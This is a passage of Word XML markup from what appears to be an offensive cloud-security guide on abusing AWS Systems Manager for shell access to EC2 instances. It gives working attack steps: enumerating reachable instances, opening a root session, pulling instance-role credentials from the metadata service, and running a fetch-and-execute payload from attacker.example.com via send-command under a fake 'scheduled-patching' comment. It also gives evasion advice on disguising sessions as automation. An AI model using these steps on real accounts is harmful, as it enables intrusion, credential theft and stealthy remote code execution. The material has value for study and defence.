        <w:t xml:space="preserve"> regardless of security groups, regardless of network routes, regardless of whether the instance has a public IP. This is the selling point of SSM: zero inbound network exposure. From an attacker's perspective it is also the selling point. If you compromise an identity that holds </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ssm:StartSession</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ssm:SendCommand</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, you have shell access to every managed instance in the target account without touching the network plane at all, and the only log entry is a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>StartSession</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> event in CloudTrail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAEC18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Run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws ssm describe-instance-information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> first to enumerate what is reachable. The output will tell you the instance id, the last ping time, the platform (Linux or Windows), and the agent version. Any instance whose </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>PingStatus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Online</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> is reachable right now. Instances whose </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>PingStatus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ConnectionLost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> may be reachable again as soon as they reboot, because the SSM agent re-registers automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E422172" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="66922749"/>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ssm describe-instance-information \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A09D301" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="66922749"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    --query </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>'InstanceInformationList[?PingStatus==`Online`].[InstanceId,PlatformName,IPAddress]'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F096DF" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="66922749"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    --output table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D8A3C1" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="66922749"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070F0C8B" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="66922749"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>|         DescribeInstanceInformation          |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6760D37C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="66922749"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>+--------------+--------------+----------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089E3596" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="66922749"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>|  i-0a1b2c3d  |  Amazon Linux|  10.0.12.44    |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387A606F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="66922749"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>|  i-0e4f5g6h  |  Ubuntu      |  10.0.12.77    |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D24ADB" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="66922749"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">|  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>i-0i7j8k9l  |  Windows     |  10.0.20.101   |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238E86CE" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="66922749"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>+--------------+--------------+----------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD65F1C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="66922749"/>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ssm start-session --target i-0a1b2c3d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140B7996" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="66922749"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="w16"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Starting session with SessionId: operator-0fabc123...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17441CC0" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="66922749"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="w16"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sh-5.2$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0FC080" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="66922749"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>uid=0(root) gid=0(root) groups=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1658C4AC" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="66922749"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="w16"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sh-5.2$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t># instance role creds are here, by definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667DA99D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="66922749"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="w16"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sh-5.2$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> curl -sH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"X-aws-ec2-metadata-token: $TOKEN"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE0CF89" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="66922749"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    169.254.169.254/latest/meta-data/iam/security-credentials/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3486C35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defender's hope is that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>StartSession</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> events are captured and reviewed. In practice, SSM sessions are so routine inside most enterprises — used by every SRE and every incident responder — that the alert value is low. Attackers who are careful to use a session name that looks like an automation user (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ci-runner-session-3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>prod-deploy-7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">) and who pass a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>SourceIdentity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> that mimics the pattern of the organization's build system are rarely distinguishable from legitimate traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3101A5B8" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>10.4  SendCommand: remote code execution as service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273F6301" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ssm:SendCommand</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the instance-level RCE primitive. It runs an arbitrary shell command — or a document containing arbitrary PowerShell, arbitrary Ansible, arbitrary shell — on one or more managed instances, as the SSM agent's service account, which on Linux is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> and on Windows is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. The interesting consequence for an attacker is that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>SendCommand</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> requires no interactive session, no SSH key, no network path to the target, and the output is returned through SSM itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C5EB1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combined primitive </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ssm:SendCommand</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> plus the AWS-managed document </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AWS-RunShellScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Linux) or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AWS-RunPowerShellScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Windows) is sufficient to run any command on any managed instance. That means any identity with this pair of permissions is, functionally, a domain admin of every EC2 instance in the account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D7AC83" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="136532110"/>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ssm send-command \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71020669" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="136532110"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    --targets </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"Key=InstanceIds,Values=i-0a1b2c3d"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BCEEC4" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="136532110"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    --document-name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"AWS-RunShellScript"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C20C285" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="136532110"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    --parameters </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>'commands=["curl -s attacker.example.com/imp.sh | bash -"]'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD3691E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="136532110"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    --comment </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"scheduled-patching"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C748708" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="136532110"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6CFD4D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="136532110"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"Command"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293E19B6" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="136532110"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"CommandId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"e5c5f3b0-..."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6D316F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="136532110"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"Status"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"Pending"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0E52C1" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="136532110"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"Parameters"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>: { ... }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16899161" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="136532110"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369AF2DB" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="136532110"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7163935F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:divId w:val="1876042888"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
